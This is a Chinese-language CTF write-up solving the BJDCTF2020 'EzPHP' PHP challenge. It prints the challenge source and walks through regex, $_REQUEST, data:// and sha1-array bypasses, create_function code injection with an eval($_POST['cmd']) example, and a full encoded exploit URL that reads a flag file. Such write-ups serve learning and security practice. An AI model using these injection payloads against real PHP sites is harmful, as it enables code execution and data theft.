说明这里就有flag有关的东西

base32解密

1nD3x.php

 <?php
highlight_file(__FILE__);
error_reporting(0); $file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";if($_SERVER) { if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']))  die('You seem to want to do something bad?');
}if (!preg_match('/http|https/i', $_GET['file'])) {if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo "Neeeeee! Good Job!<br>";}
} else die('fxck you! What do you want to do ?!');if($_REQUEST) { foreach($_REQUEST as $value) { if(preg_match('/[a-zA-Z]/i', $value))  die('fxck you! I hate English!'); }
} if (file_get_contents($file) !== 'debu_debu_aqua')die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){extract($_GET["flag"]);echo "Very good! you know my password. But what is flag?<br>";
} else{die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else { include "flag.php";$code('', $arg);
} ?>

第一个限制

if($_SERVER) { if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']))  die('You seem to want to do something bad?');
}

因为$_SERVER[‘QUERY_STRING’]不会url解码,可以通过url编码绕过

第二个限制

if (!preg_match('/http|https/i', $_GET['file'])) {if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { $file = $_GET["file"]; echo "Neeeeee! Good Job!<br>";}
} else die('fxck you! What do you want to do ?!');

preg_match值匹配第一行,句尾加上%0a进行绕过,绕过preg_match主要有两种方法即换行符与PRCE回溯此处超出。
payload:dedu=aqua_is_cute%0a
第三个限制

if($_REQUEST) { foreach($_REQUEST as $value) { if(preg_match('/[a-zA-Z]/i', $value))  die('fxck you! I hate English!'); }
}

$_REQUEST方式接收请求的优先级别默认情况下先接受POST,所以在get的同时post数字就可以了。
payload:POST:debu=1&file=2
第四个限制

if (file_get_contents($file) !== 'debu_debu_aqua')die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

这里利用data协议即可:file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61
与此同时file也需要被post一下。

第五个限制

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){extract($_GET["flag"]);echo "Very good! you know my password. But what is flag?<br>";
} else{die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

因为sha1无法处理数组,当sha1()的参数为数组,就会返回false,所以可用数组绕过
payload:shana[]=1&passwd[]=2

第六个限制

if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else { include "flag.php";$code('', $arg);
}

这里用到了create_function()代码注入
create_function()函数有两个参数args和args和args和code,用于创建一个lambda样式的函数

例如:$myfunc = create_function('$a, $b', 'return $a+$b;');
相当于:

function myfunc($a, $b){return $a+$b;
}

当第二个参数无限制时:

$code=return $a+$b;}eval($_POST['cmd']);//

就会变成:

function myfunc($a, $b){return $a+$b;
}
eval($_POST['cmd']);//}

上一阶段sha1比较的过程中,extract($_GET["flag"]);这里我们可以进行变量覆盖,从而掌控住arg变量与code变量。
同时根据上面的可以通过闭合符号来执行自己定义的函数:

&flag[arg]=}a();//&flag[code]=create_function

拼接过后就应该是:

function {}a();//}

这个a我们是可以随时改成其他的函数的。
但是此时很多函数都被禁用了,文件中包含了flag这个文件,利用get_defined_vars()将所有变量与值都进行输出,此时payload就为:

flag[arg]=}var_dump(get_defined_vars());//&flag[code]=create_function

输出出来但还不是真正的flag,提示是在另一个文件里面,flag4.php,此时可以利用require,来代替include,利用base64编码绕过flag的过滤,利用require()来代替require" "。

http://a9f790f1-3df5-4d89-9a4e-7c778bc45274.node3.buuoj.cn/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=;}define(aaa,fopen(~(%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f),r));while(!feof(aaa))var_dump(fgets(aaa));fclose(aaa);%23
debu=1&file=1

[BJDCTF2020]EzPHP相关推荐

  1. BJDctf2020 Ezphp

    BJDctf2020 Ezphp 目录 BJDctf2020 Ezphp 2.preg_match绕过 3.$_REQUEST绕过 4.file_get_contents绕过 5.sha1函数.比较类 ...

  2. [BJDCTF2020]EzPHP 1

    目录 前言 源码 思路 第一层过滤 第三层过滤 第四层和第二层过滤 第五层 第六层过滤 题解 解法一 解法二 总结 前言 这题也来自Y1ng师傅的babycode,刚刚做完babycode,顺便刷一刷 ...

  3. 2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass

    首先,本文借鉴的大老婆博客如下: 出题大佬博客,详细讲解了各种知识点 一位大佬的详细解题过程(偷懒,自己就不写了) 就简单写写(赋值粘贴)一些比较重要的知识点(× create_function函数: ...

  4. [BUU刷题记录]day01-起步

    BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...

  5. Buuctf -web wp汇总(三)

    Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...

  6. BUUCTF笔记之Web系列部分WriteUp(五)

    1.[GWCTF 2019]枯燥的抽奖 查看源码得到check.php,访问得到代码: <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: te ...

  7. cl.ez6.xyz index.php,[BJDCTF2020]EzPHP-POP链

    那次某信内部比赛中有道pop链问题的题目,我当时没有做出来,所以在此总结一下,本次以buu上复现的[MRCTF2020]Ezpop为例. 题目 1 Welcome to index.php 2 < ...

  8. BUUCTF-[BJDCTF2020]EzPHP

    一道挺不错的绕正则表达式的题. 打开环境 点一点发现啥也没有,日常看源码.Ctrl+U发现了一个加密,本以为是base64,但是解码失败,试了试base32成功了 这里推荐一个网站CTF在线工具-CT ...

  9. [BJDCTF2020]Mark loves cat

    首先打开网站看到的是一个个人博客,这种常规的 类似实战题目 先扫描目录看看 路径扫描 没错这真的是我的字典,就7个路径,哈哈哈,还在收集啊 git泄露 看到了一个 .git 泄露 用了俩工具测试,无任 ...

最新文章

  1. ElasticSearch学习总结(三):查询总结
  2. python if语句和循环语句
  3. python excel详解_python操作excel详解
  4. SAP Spartacus All Units页面里的按钮style和对应的scss实现
  5. 深度学习分布式训练小结
  6. JeecgBoot Minio版本6.0.13升级到8.0.3修改方法
  7. C++使用简单的函数指针
  8. ENVI 监督分类Max stdev from Mean 参数IDL中的设置
  9. 打造个人多媒体服务器之二
  10. SkinSharp破解版与模版皮肤下载与使用
  11. python reshape函数参数-1(X.reshape(X.shape[0], -1).T)
  12. 简单快速将pdf转换成jpg的方法
  13. arduino八段数码管使用
  14. 【视野】中国的程序员培训是不是有问题?
  15. 细数互联网企业组织架构大调整
  16. 绝地求生信号枪只能在服务器吗,绝地求生:信号枪很多人不知道的4大用处 第4居然可以这么用!...
  17. Java泛型面试也能虐暴你
  18. 权威认可 | 悬镜云鲨RASP荣获信通院“2021金融行业年度卓越创新案例”
  19. 微软office365服务器地址,由世纪互联运营的 Office 365 的 URL 和 IP 地址范围
  20. macbook pro 700自己换SSD 开启AHC

热门文章

  1. JavaScript 正则表达式的学习
  2. 3月15日 Glority睿琪软件春招笔试回忆
  3. 视口锁定解锁lisp_CAD基础知识汇总第十四期:如何创建异形视口和解除视口锁定?...
  4. 专注安防监控,雄迈消费类产品全线标配AI功能,让家用类监控更智能
  5. word从当前页设置页码
  6. 考计算机软考还需要评定职称吗,软考评职称还需要年限吗
  7. 直角三角形 射影定理 欧几里德定理
  8. 截取文本内容,包括中英文,多余则显示省略号
  9. 活动报名|ICLR 2023杰出论文奖一作张博航:从图双连通性的角度重新思考图神经网络的表达能力...
  10. Windows下搭建ARM11裸机开发环境(1):工具安装